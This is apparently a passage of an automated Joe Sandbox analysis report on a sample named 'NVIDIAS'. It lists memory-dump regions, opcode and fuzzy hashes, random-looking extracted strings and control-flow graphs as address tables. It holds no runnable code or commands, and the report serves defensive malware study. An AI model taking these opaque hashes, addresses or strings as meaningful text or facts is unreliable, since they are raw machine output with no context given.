                                                                        • Instruction Fuzzy Hash: 34E32075E106299FCB54DF69C880A9DB7B6EF89210F1181EAD809F7350DB71AE81CF90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ;7X$,U$.s2-$1P#8$5q-[$S
                                                                        • API String ID: 0-2442268200
                                                                        • Opcode ID: 45220ebd394fcef736e6f295cd5c9e35a30ac34b0657478557c17377633a41dc
                                                                        • Instruction ID: 5ef0ee1c39e030c33630bdcf25aa5b64dc4cf4e6bffe8de105451a50a3ea1ad4
                                                                        • Opcode Fuzzy Hash: 45220ebd394fcef736e6f295cd5c9e35a30ac34b0657478557c17377633a41dc
                                                                        • Instruction Fuzzy Hash: 70E32075E106299FCB54DF69C880A9DB7B6EF89210F1181EAD809F7350DB71AE81CF90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !5g$0@&G$2l%\$7r>$=7$J:)
                                                                        • API String ID: 0-1553758874
                                                                        • Opcode ID: fd510f35191aa08b539817fdba17fbe96bec7fd99261500762f5b744a9aeb03f
                                                                        • Instruction ID: ee384f18cddc26e3346689500417b580854c11acc8cd52046ffb7f828cc24746
                                                                        • Opcode Fuzzy Hash: fd510f35191aa08b539817fdba17fbe96bec7fd99261500762f5b744a9aeb03f
                                                                        • Instruction Fuzzy Hash: BA936275A002199FCB54DFA8C890A9DF7B6FF88310F1585AAD409EB351DB35AD86CF80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: U9!$#D<$$$72.$E7t
                                                                        • API String ID: 0-1360831551
                                                                        • Opcode ID: 7abf599a52734d5e0dba0305dbcec112d070c0307f4bc41fe0d4e07eef078d69
                                                                        • Instruction ID: bf70f433b9053e3830b26463d8d4cb6fe3b25533b9c0322ef890690758834215
                                                                        • Opcode Fuzzy Hash: 7abf599a52734d5e0dba0305dbcec112d070c0307f4bc41fe0d4e07eef078d69
                                                                        • Instruction Fuzzy Hash: B8639136B002259FC714DF69D8909AAF7F6FB88350B15856AD80AEB351DB31EC46CF80

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 4984 353e061-353e084 4986 353e089-353e203 call 353db10 * 6 4984->4986 5006 353e2e5-353e879 call 353db10 * 41 4986->5006 5007 353e209-353e247 call 353db10 4986->5007 5143 353e87e-353ec47 call 353db10 * 26 5006->5143 5007->5006 5011 353e24d-353e26a 5007->5011 5013 353e26f-353e2a5 call 353db10 5011->5013 5013->4986 5026 353e2ab-353e2cc 5013->5026 5026->5006 5028 353e2ce-353e2e4 5026->5028 5224 353ec63-353f085 call 353db10 * 18 5143->5224 5225 353ec49-353ec62 5143->5225 5284 353f087-353f09d 5224->5284 5285 353f09e-353f11f 5224->5285
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $!$"$#$$
                                                                        • API String ID: 0-2407675498
                                                                        • Opcode ID: 0c47956b4fe9b1a829488329fc7251b6cb7f4e7d844a7268821e396099d29976
                                                                        • Instruction ID: ab68e78ed81b4983cdcb59ed84413b51fe8ea431abcff0d149fd5ccfad1a92b7
                                                                        • Opcode Fuzzy Hash: 0c47956b4fe9b1a829488329fc7251b6cb7f4e7d844a7268821e396099d29976
                                                                        • Instruction Fuzzy Hash: EA82E376B002254BD748EBA9D8607AEA2FBABC4700F05456DC44AEB391CF75DC178BE1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: %2&b$+];$2Ta
                                                                        • API String ID: 0-3369895701
                                                                        • Opcode ID: 569199f0295a485077f70807088f10368fd8aa96face324d7a7c241f7c77232a
                                                                        • Instruction ID: aab8cee708d6b484ee244cbf925832235da90c796a063d35e5aa0f90cca57fb4
                                                                        • Opcode Fuzzy Hash: 569199f0295a485077f70807088f10368fd8aa96face324d7a7c241f7c77232a
                                                                        • Instruction Fuzzy Hash: 65037775A016198FCB24DF68CCD4A9DBBB2FF88210F1581A9E909AB361DB35DD85CF40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: >*B$r6)$d
                                                                        • API String ID: 0-3739268421
                                                                        • Opcode ID: fdf158b7704d19d33cf869daf9186dd9e7c54e87730758e6fdbc446790dced64
                                                                        • Instruction ID: ac211f02f2cdce5ee8300df2c26c5a4f213cf3e14172e7a1a3a29e391cc38ad7
                                                                        • Opcode Fuzzy Hash: fdf158b7704d19d33cf869daf9186dd9e7c54e87730758e6fdbc446790dced64
                                                                        • Instruction Fuzzy Hash: BAE26276E102288FDB64CF58C994A99F7F2AB88314F1582EAD809EB351D731DD85CF80

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 7137 7312ba3-7312bb8 7138 7312bba-7312bbc 7137->7138 7139 7312bbe 7137->7139 7138->7139 7140 7312bc0-7312bc9 7139->7140 7141 7312bcf-7312bf6 7139->7141 7142 7312bce 7140->7142 7144 7312bf9-7312c05 7141->7144 7145 7312c0b-7312c1c 7144->7145 7146 73131bd-73131e7 7144->7146 7150 7312c21-7312c4e 7145->7150 7151 73131ec-7313201 7146->7151 7150->7146 7152 7312c54-7312ca4 7150->7152 7153 7313203-731321c 7151->7153 7154 7313249-7313259 7151->7154 7152->7146 7155 7312caa-7312d0d 7152->7155 7162 731323c-7313242 7153->7162 7163 731321e-7313236 7153->7163 7161 731325f-7313293 7154->7161 7155->7146 7156 7312d13-7312d32 7155->7156 7156->7144 7159 7312d38 7156->7159 7160 7312fb6-7312fc0 7159->7160 7160->7144 7164 7312fc6-7312fdd 7160->7164 7175 7313295-731329b 7161->7175 7176 731324d-7313259 7161->7176 7162->7151 7166 7313244-7313248 7162->7166 7163->7162 7167 7312fe3-7312ff2 7164->7167 7168 7312d3d-7312d47 7164->7168 7167->7146 7171 7312ff8-731303a 7167->7171 7170 7312e63-7312e83 7168->7170 7170->7144 7173 7312e89-7312e98 7170->7173 7171->7146 7174 7313040-7313066 7171->7174 7177 7312d4c-7312d6a 7173->7177 7178 7312e9e-7312ea5 7173->7178 7174->7146 7184 731306c-7313096 7174->7184 7176->7161 7177->7150 7179 7312d70-7312db3 7177->7179 7178->7144 7180 7312eab-7312ece 7178->7180 7179->7146 7182 7312db9-7312e13 7179->7182 7180->7146 7183 7312ed4-7312f16 7180->7183 7182->7146 7185 7312e19-7312e48 7182->7185 7183->7146 7192 7312f1c-7312f36 7183->7192 7184->7146 7186 731309c-731313a 7184->7186 7185->7144 7187 7312e4e-7312e5d 7185->7187 7198 7313161-731316c 7186->7198 7187->7170 7192->7146 7193 7312f3c-7312f7d 7192->7193 7193->7144 7199 7312f83-7312fb0 7193->7199 7198->7144 7200 7313172-7313194 7198->7200 7199->7160 7200->7146 7201 7313196-73131b0 7200->7201 7203 73131b2-73131bc 7201->7203 7204 731313c-731314a 7201->7204 7206 7313152-731315c 7204->7206 7206->7198
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1219270716.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_7310000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #5}$;L(|
                                                                        • API String ID: 0-3985745917
                                                                        • Opcode ID: a366588a9fc7e6a66474753e781b50db567356f7bc0f6028b846607e19d46e77
                                                                        • Instruction ID: e59f2a58e5ddf796bbc6378b58d17d6f03ac39f241432c4717796b86c7508dff
                                                                        • Opcode Fuzzy Hash: a366588a9fc7e6a66474753e781b50db567356f7bc0f6028b846607e19d46e77
                                                                        • Instruction Fuzzy Hash: AA12A276F102258FD718CEADC89059AF7F6BB8830071A856AD809EB355DB74EC46CBC0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: H97
                                                                        • API String ID: 0-463401740
                                                                        • Opcode ID: 5fac3a04395894e6290349c732b57b1c3e1090b9f00b5b35b9251ae4f4f6930a
                                                                        • Instruction ID: e7ced7315468cce365be63a2e203bd6e820a4592e8e14502e457015a370b2205
                                                                        • Opcode Fuzzy Hash: 5fac3a04395894e6290349c732b57b1c3e1090b9f00b5b35b9251ae4f4f6930a
                                                                        • Instruction Fuzzy Hash: A3F21976A016198FDB58CF59CC94A9DB7B3BBC8310F29869AD849E7351DB30DD828F40

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 7574 33abed0-33abeda 7575 33abedc-33abefb call 33aa5f8 7574->7575 7579 33abf0f-33abf6b 7575->7579 7580 33abefd-33abf05 7575->7580 7585 33abf70-33abf85 7579->7585 7580->7575 7581 33abf07-33abf0e 7580->7581 7587 33abfe8-33ac014 7585->7587 7588 33abf87-33abf89 7585->7588 7592 33ac01a 7587->7592 7593 33ac26e-33ac274 7587->7593 7589 33abf8b-33abfa2 7588->7589 7590 33abfaf-33abfbd 7588->7590 7589->7590 7609 33abfa4-33abfad 7589->7609 7610 33abfbf-33abfc5 7590->7610 7611 33abfd7-33abfd9 7590->7611 7597 33ac07a-33ac086 7592->7597 7598 33ac1da-33ac202 7592->7598 7599 33ac22f-33ac240 7592->7599 7600 33ac0ec-33ac122 7592->7600 7601 33ac15d-33ac17b call 33a95e0 7592->7601 7602 33ac0b0-33ac0c2 7592->7602 7603 33ac180-33ac18c 7592->7603 7604 33ac021-33ac02c 7592->7604 7605 33ac056-33ac075 7592->7605 7606 33ac1b6-33ac1d5 7592->7606 7607 33ac127-33ac133 7592->7607 7608 33ac207-33ac22a 7592->7608 7593->7585 7596 33ac27a-33ac29c 7593->7596 7629 33ac29e-33ac2a4 7596->7629 7630 33ac2e6-33ac2f4 7596->7630 7597->7585 7616 33ac08c-33ac0ab 7597->7616 7633 33ac475-33ac47a 7598->7633 7599->7585 7617 33ac246-33ac269 7599->7617 7600->7633 7601->7633 7602->7585 7619 33ac0c8-33ac0e7 7602->7619 7603->7590 7618 33ac192-33ac1b1 7603->7618 7604->7585 7612 33ac032-33ac051 7604->7612 7605->7633 7606->7633 7607->7585 7613 33ac139-33ac158 7607->7613 7608->7633 7609->7590 7614 33abfc9-33abfd5 7610->7614 7615 33abfc7 7610->7615 7705 33abfdb call 33ac888 7611->7705 7706 33abfdb call 33ac879 7611->7706 7612->7633 7613->7633 7614->7611 7615->7611 7616->7633 7617->7633 7618->7633 7619->7633 7626 33abfe1-33abfe3 7626->7633 7629->7585 7639 33ac2aa-33ac2ac 7629->7639 7630->7590 7643 33ac2fa-33ac32d 7630->7643 7648 33ac2ae-33ac2b0 7639->7648 7649 33ac2b2-33ac2b8 7639->7649 7670 33ac32f-33ac348 7643->7670 7671 33ac3a1-33ac3b6 7643->7671 7656 33ac2c9-33ac2e1 7648->7656 7657 33ac2ba-33ac2bc 7649->7657 7658 33ac2c6 7649->7658 7656->7633 7657->7658 7658->7656 7670->7609 7675 33ac34e-33ac350 7670->7675 7679 33ac3b8-33ac3c4 7671->7679 7680 33ac3e7-33ac3ed 7671->7680 7677 33ac36d-33ac373 7675->7677 7678 33ac352-33ac363 7675->7678 7683 33ac381 7677->7683 7684 33ac375-33ac377 7677->7684 7678->7585 7682 33ac369-33ac36b 7678->7682 7679->7589 7685 33ac3ca-33ac3e2 7679->7685 7680->7585 7686 33ac3f3-33ac413 7680->7686 7687 33ac384-33ac39c 7682->7687 7683->7687 7684->7683 7685->7633 7691 33ac45e-33ac473 call 33a8af0 7686->7691 7692 33ac415-33ac41d 7686->7692 7687->7633 7691->7633 7694 33ac41f-33ac42f 7692->7694 7695 33ac431-33ac438 7692->7695 7697 33ac43a-33ac45c 7694->7697 7695->7697 7697->7633 7705->7626 7706->7626
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "L%$)?%P
                                                                        • API String ID: 0-2530928089
                                                                        • Opcode ID: 15ede54413537b1ba337c18c55ebae7f3a282eed994d7623fabd2c6972664825
                                                                        • Instruction ID: 6ea1e652962bd6c5ed7743877621a80438273ea60740dc0375b837fc9b40c301
                                                                        • Opcode Fuzzy Hash: 15ede54413537b1ba337c18c55ebae7f3a282eed994d7623fabd2c6972664825
                                                                        • Instruction Fuzzy Hash: 84D11936B006244B8B19EE7D4C9423DA5D7EFC966030D45BEE807EB399DE60CC4A47D5

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 7707 830be38-830be5c 7708 830be61-830be70 7707->7708 7709 830be76-830be8d 7708->7709 7710 830c2c7-830c2ec 7708->7710 7713 830bea1-830beda 7709->7713 7714 830be8f-830be95 7709->7714 7718 830c2f1-830c311 7710->7718 7713->7710 7719 830bee0-830bf0d 7713->7719 7714->7708 7715 830be97-830be9e 7714->7715 7725 830c317-830c34a 7718->7725 7726 830c399-830c3d4 7718->7726 7719->7708 7722 830bf13-830bf23 7719->7722 7722->7710 7724 830bf29-830bfd7 7722->7724 7740 830c008-830c014 7724->7740 7741 830bfd9-830c006 7724->7741 7725->7718 7733 830c34c-830c377 7725->7733 7739 830c3db-830c3e0 7726->7739 7733->7718 7738 830c37d-830c391 7733->7738 7738->7726 7742 830c2b3-830c2b8 7740->7742 7743 830c01a-830c03d 7740->7743 7741->7740 7750 830c2bd-830c2c4 7742->7750 7748 830c043-830c059 7743->7748 7749 830c29e-830c2ab 7743->7749 7748->7740 7752 830c05b-830c120 7748->7752 7749->7741 7751 830c2b1 7749->7751 7751->7750 7752->7742 7760 830c126-830c143 7752->7760 7762 830c145-830c154 7760->7762 7763 830c17e-830c18a 7760->7763 7762->7742 7765 830c15a-830c17c 7762->7765 7764 830c190-830c204 7763->7764 7764->7741 7773 830c20a-830c26b 7764->7773 7765->7764 7773->7742 7776 830c26d-830c298 7773->7776 7776->7749
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .&&$;M
                                                                        • API String ID: 0-1523854721
                                                                        • Opcode ID: 2861d5619243a6751dced060aeda23284cd98bb5651babbefcc74dd150238d4f
                                                                        • Instruction ID: 33d04ab39bd6f4a464dcd0e7ef8b4823313eeec6cb26fbc91f978feef09b9244
                                                                        • Opcode Fuzzy Hash: 2861d5619243a6751dced060aeda23284cd98bb5651babbefcc74dd150238d4f
                                                                        • Instruction Fuzzy Hash: 86F1A132E102258BDB14DFA9C89099EF7F6BB88350756866AD809EB750DB31DC56CFC0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 7779 830cf38-830cf70 7780 830cf72-830cf7a 7779->7780 7781 830cfb8-830cfc7 7779->7781 7784 830cf80-830cf8e 7780->7784 7785 830d021-830d027 7780->7785 7782 830cfc9 7781->7782 7783 830cfce-830cff3 7781->7783 7786 830d4f9-830d516 7782->7786 7787 830cff9-830d01b 7783->7787 7788 830d49b-830d4c1 7783->7788 7784->7781 7791 830cf90-830cf93 7784->7791 7789 830d042-830d064 7785->7789 7790 830d029-830d02d 7785->7790 7792 830d4f4 7786->7792 7793 830d518-830d52a 7786->7793 7787->7785 7808 830d4c3-830d4d3 7788->7808 7809 830d4ed-830d4f2 7788->7809 7797 830d42a 7789->7797 7798 830d06a-830d07e 7789->7798 7795 830d033-830d040 7790->7795 7796 830d1e7-830d200 7790->7796 7794 830cf95-830cfa8 7791->7794 7792->7786 7806 830d52f-830d536 7793->7806 7794->7786 7799 830cfae-830cfb6 7794->7799 7795->7789 7804 830d080-830d08f 7795->7804 7801 830d202-830d206 7796->7801 7802 830d218-830d236 7796->7802 7814 830d42f-830d438 7797->7814 7798->7790 7798->7804 7799->7781 7799->7794 7810 830d33a-830d340 7801->7810 7811 830d20c-830d212 7801->7811 7812 830d40b-830d410 7802->7812 7813 830d23c-830d256 7802->7813 7804->7797 7807 830d095-830d0cf 7804->7807 7807->7797 7831 830d0d5-830d0f0 7807->7831 7808->7792 7817 830d4d5-830d4e8 7808->7817 7809->7806 7815 830d2e0-830d30b 7810->7815 7816 830d342-830d379 7810->7816 7811->7802 7818 830d2b7-830d2da 7811->7818 7838 830d415-830d428 7812->7838 7856 830d259 call 55a2b38 7813->7856 7857 830d259 call 55a2b19 7813->7857 7858 830d259 call 55a2b23 7813->7858 7820 830d468-830d46e 7814->7820 7821 830d43a-830d44e 7814->7821 7830 830d314-830d31c 7815->7830 7816->7802 7839 830d37f-830d39d 7816->7839 7817->7809 7818->7801 7818->7815 7822 830d470 7820->7822 7823 830d456-830d459 7820->7823 7821->7820 7828 830d450 7821->7828 7822->7788 7834 830d462 7823->7834 7826 830d25b-830d25d 7833 830d260-830d279 7826->7833 7828->7823 7835 830d322-830d335 7830->7835 7836 830d28e-830d2b1 7830->7836 7831->7797 7837 830d0f6-830d124 7831->7837 7840 830d3bc-830d3c8 7833->7840 7841 830d27f-830d28c 7833->7841 7834->7820 7835->7814 7836->7802 7836->7818 7837->7797 7847 830d12a-830d195 7837->7847 7838->7814 7839->7833 7842 830d3a3-830d3b6 7839->7842 7840->7802 7843 830d3ce-830d3e4 7840->7843 7841->7833 7841->7836 7842->7840 7845 830d3e6 7843->7845 7846 830d3eb-830d403 7843->7846 7845->7846 7846->7801 7849 830d409 7846->7849 7847->7797 7853 830d19b-830d1e1 7847->7853 7849->7838 7853->7796 7856->7826 7857->7826 7858->7826
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1221894244.0000000008300000.00000040.00000800.00020000.00000000.sdmp, Offset: 08300000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_8300000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4<Q$7>*9
                                                                        • API String ID: 0-12894886
                                                                        • Opcode ID: 14a3e57a8dac9c42597ae58ef866ec1502cded0bc3a12da55ba566d9fce73dbd
                                                                        • Instruction ID: 50c48c030c8cf531f172c81729e8c0f701704c137878df9463318374358f14a0
                                                                        • Opcode Fuzzy Hash: 14a3e57a8dac9c42597ae58ef866ec1502cded0bc3a12da55ba566d9fce73dbd
                                                                        • Instruction Fuzzy Hash: 2BF15F36E012148FDB14CFACC494999B7F6AB88350B1AC65ADC59EB391DB31EC46CF90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 7859 33a96d0-33a96f4 7860 33a96f7-33a971c call 33a9670 7859->7860 7863 33a971e-33a973f call 33a8748 7860->7863 7867 33a9741-33a9752 7863->7867 7869 33a9758-33a9794 7867->7869 7869->7867 7872 33a9796-33a97c8 7869->7872 7872->7863 7875 33a97ce-33a97e5 7872->7875 7875->7860 7876 33a97eb-33a97f3 7875->7876 7877 33a97f9-33a981d 7876->7877 7878 33a9913-33a9929 7876->7878 7877->7863 7883 33a9823 7877->7883 7878->7860 7879 33a992f-33a9958 call 33a9368 7878->7879 7879->7867 7884 33a995e-33a998a 7879->7884 7885 33a98da-33a98e7 7883->7885 7888 33a99dc-33a99f5 7884->7888 7889 33a998c-33a9996 7884->7889 7885->7860 7887 33a98ed-33a9907 7885->7887 7890 33a9828-33a9862 call 33a9670 7887->7890 7891 33a990d 7887->7891 7888->7869 7895 33a99fb-33a9a42 call 33a9368 call 33a1098 call 33a8890 7888->7895 7893 33a99cb-33a99d1 7889->7893 7894 33a9998-33a99b1 7889->7894 7909 33a9873-33a98d4 call 33a9368 7890->7909 7910 33a9864-33a986c 7890->7910 7891->7878 7899 33a9bbf 7893->7899 7900 33a99d7 7893->7900 7897 33a9bda-33a9c2c 7894->7897 7898 33a99b7-33a99c3 7894->7898 7920 33a9a47-33a9a57 7895->7920 7902 33a9bc1-33a9bd3 7897->7902 7907 33a9c2e-33a9c33 7897->7907 7898->7888 7903 33a99c5 7898->7903 7899->7902 7900->7863 7902->7897 7903->7893 7909->7885 7910->7909 7920->7860 7922 33a9a5d-33a9aab 7920->7922 7923 33a9ada-33a9aef 7922->7923 7924 33a9aad-33a9ac6 7922->7924 7923->7924 7930 33a9af1-33a9af7 7923->7930 7926 33a9ac8-33a9ad4 7924->7926 7927 33a9b0e 7924->7927 7926->7923 7931 33a9b13 7927->7931 7930->7923 7933 33a9af9-33a9b0c 7930->7933 7931->7899 7933->7931
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211109726.00000000033A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_33a0000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: d8$"n'
                                                                        • API String ID: 0-122169730
                                                                        • Opcode ID: d1424fd06ccff4bfd13d8a9e4e7488b6969b43bb5b6ac2156744f77902efc505
                                                                        • Instruction ID: ed35b3f4a77f21ed045783ee863fb32a1e8bfcf583ea8ef423d528e75a5d141c
                                                                        • Opcode Fuzzy Hash: d1424fd06ccff4bfd13d8a9e4e7488b6969b43bb5b6ac2156744f77902efc505
                                                                        • Instruction Fuzzy Hash: 81D18A75B007098FCB18DFA9C8D4A9DB7F6EF89200B698169E509EF365DB759C06CB00

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 7934 3531b10-3531b19 7935 3531b1c-3531b28 7934->7935 7936 3531b3a-3531bb2 7935->7936 7937 3531b2a-3531b35 7935->7937 7936->7935 7945 3531bb8 7936->7945 7938 3531c1d-3531c31 7937->7938 7938->7935 7940 3531c37-3531c56 7938->7940 7946 3531bf5-3531c00 7945->7946 7946->7937 7947 3531c06-3531c15 7946->7947 7948 3531c17 7947->7948 7949 3531bba-3531bbd 7947->7949 7948->7938 7950 3531bc3-3531bf0 7949->7950 7951 3531c57-3531c7c 7949->7951 7950->7946 7954 3531c81-3531cb3 7951->7954 7958 3531cb5-3531cb7 7954->7958 7959 3531cb9-3531cbb 7958->7959 7960 3531cbd-3531cc9 7958->7960 7961 3531cda-3531cfd 7959->7961 7960->7954 7962 3531ccb-3531cd8 7960->7962 7965 3531d40-3531d7c 7961->7965 7966 3531cff-3531d1b 7961->7966 7962->7961 7973 3531d7f-3531d81 7965->7973 7966->7954 7967 3531d21-3531d27 7966->7967 7968 3531d35-3531d3f 7967->7968 7969 3531d29-3531d2b 7967->7969 7969->7968 7974 3531e0b-3531e14 7973->7974 7975 3531d86-3531d8e 7974->7975 7976 3531e1a-3531e21 7974->7976 7977 3531d90-3531d95 7975->7977 7978 3531d9d-3531da9 7975->7978 7977->7978 7979 3531e22-3531e75 7978->7979 7980 3531dab-3531db9 7978->7980 7991 3531e97-3531ea9 7979->7991 7992 3531e77-3531e8b 7979->7992 7983 3531e01-3531e09 7980->7983 7984 3531dbb-3531dc7 7980->7984 7983->7974 7984->7973 7986 3531dc9-3531dfb 7984->7986 7986->7983 7992->7991 7996 3531e8d 7992->7996 7997 3531e94 7996->7997 7997->7991
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1211439449.0000000003530000.00000040.00000800.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_3530000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (P:r$(Y/v
                                                                        • API String ID: 0-1496278603
                                                                        • Opcode ID: abfcf14d1da8f15fc0c3c9a38b328ac0380ee6e98afab213030d8653273b5b0f
                                                                        • Instruction ID: 39d4f2d9f0cee841f593851b3ea9c9edb7156d9930d671c0ed515c93c089e742
                                                                        • Opcode Fuzzy Hash: abfcf14d1da8f15fc0c3c9a38b328ac0380ee6e98afab213030d8653273b5b0f
                                                                        • Instruction Fuzzy Hash: 88A13672F006258FCB18EF78D89496EBBB2BF8521071A85BAD805EB360DB719C01C7D0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 8658 5d497e8-5d497f4 8659 5d497f9-5d49805 8658->8659 8661 5d4980d-5d49835 8659->8661 8663 5d49a67-5d49a8c 8661->8663 8664 5d4983b-5d49856 8661->8664 8668 5d49a8e-5d49aa3 8663->8668 8664->8663 8665 5d4985c-5d498bc 8664->8665 8675 5d49914-5d4992d 8665->8675 8676 5d498be-5d498dc 8665->8676 8673 5d49aa8-5d49ac7 8668->8673 8680 5d49bc4-5d49bd1 8673->8680 8681 5d49acd 8673->8681 8675->8659 8679 5d49933-5d49990 8675->8679 8676->8663 8678 5d498e2-5d498fa 8676->8678 8678->8675 8690 5d498fc-5d49904 8678->8690 8679->8659 8704 5d49996-5d499a4 8679->8704 8680->8668 8682 5d49bd7-5d49c21 8680->8682 8683 5d49ad2-5d49aee 8681->8683 8710 5d49c27-5d49c62 8682->8710 8711 5d49b72-5d49b96 8682->8711 8684 5d49af4-5d49b0b 8683->8684 8685 5d49c72-5d49c9f 8683->8685 8684->8685 8689 5d49b11-5d49b6c 8684->8689 8694 5d49ca2-5d49cbc 8685->8694 8689->8683 8689->8711 8690->8661 8692 5d4990a-5d49911 8690->8692 8702 5d49cc2-5d49d60 call 5d44a20 8694->8702 8703 5d4a03a-5d4a03f 8694->8703 8741 5d49d65-5d49d7b 8702->8741 8713 5d4a044-5d4a04b 8703->8713 8704->8663 8708 5d499aa-5d49a20 8704->8708 8708->8659 8728 5d49a26-5d49a57 8708->8728 8710->8668 8722 5d49c68-5d49c6f 8710->8722 8711->8685 8712 5d49b9c-5d49bac 8711->8712 8712->8680 8721 5d49bae-5d49bb4 8712->8721 8721->8673 8723 5d49bba-5d49bc1 8721->8723 8728->8676 8733 5d49a5d-5d49a64 8728->8733 8741->8703 8742 5d49d81-5d49d9c 8741->8742 8744 5d49da2-5d49db3 8742->8744 8745 5d49e5a 8742->8745 8744->8694 8746 5d49db9-5d49dcd 8744->8746 8747 5d49e62-5d49ead 8745->8747 8746->8703 8748 5d49dd3-5d49e04 8746->8748 8753 5d4a024-5d4a032 8747->8753 8754 5d49eb3 8747->8754 8748->8703 8749 5d49e0a-5d49e55 8748->8749 8757 5d49eb9-5d49ec8 8749->8757 8760 5d49e57 8749->8760 8753->8741 8756 5d4a038 8753->8756 8754->8757 8756->8713 8757->8703 8758 5d49ece-5d49f48 8757->8758 8758->8703 8764 5d49f4e-5d49f68 8758->8764 8760->8745 8764->8703 8765 5d49f6e-5d49fa3 8764->8765 8765->8703 8767 5d49fa9-5d49fe7 8765->8767 8767->8745 8771 5d49fed-5d4a01e 8767->8771 8771->8753
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1217511922.0000000005D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_5d40000_NVIDIAS.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Cr7m^
                                                                        • API String ID: 0-3967420356
                                                                        • Opcode ID: 188d32cf5f8c9cc15b4b9d727fbb275104b365f47fc702cfe29ec148e0f7759f
                                                                        • Instruction ID: 160043c0f9764b4831aa9a8bd9999d1f6948b46c4b2c774174e25de8b98e319d
